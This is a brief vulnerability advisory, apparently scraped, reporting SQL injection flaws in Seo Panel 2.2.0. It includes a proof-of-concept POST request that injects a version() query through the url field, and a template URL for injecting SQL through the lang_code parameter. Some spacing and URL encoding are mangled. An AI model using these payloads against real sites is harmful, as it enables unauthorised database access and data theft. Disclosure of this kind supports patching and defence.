Seo Panel 2.2.0 SQL injection vulnerabilities-vulnerability warning-the black bar safety net

ID MYHACK58:62201129183
Type myhack58
Reporter 佚名
Modified 2011-02-16T00:00:00


Seo Panel is a site management and SEO system, Seo Panel 2.2.0 of the websites. php and index. php existsSQL injectionvulnerabilities that could lead to sensitive information disclosure.

[+]info: ~~~~~~~~~ Seo Panel 2.2.0 SQL Injection Vulnerabilities Product: Seo Panel Vendor: ( ) Vulnerable Version: 2.2.0 Vendor Notification: 0 1 February 2 0 1 1 Vulnerability Type: SQL Injection Risk level: High Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (

[+]poc: ~~~~~~~~~ The following PoC is available: POST /websites.php HTTP/1.1

sec=create&name=1 2 3&url=http%3A%2F%2F123'%2Cversion()%2C1%2C1%2C2%2C1)%2 0--%2 0&title=1&description=1&keywords=1

http://[host]/index. php?& amp;lang_code=1%27SQL_CODE_HERE

[+]Reference: ~~~~~~~~~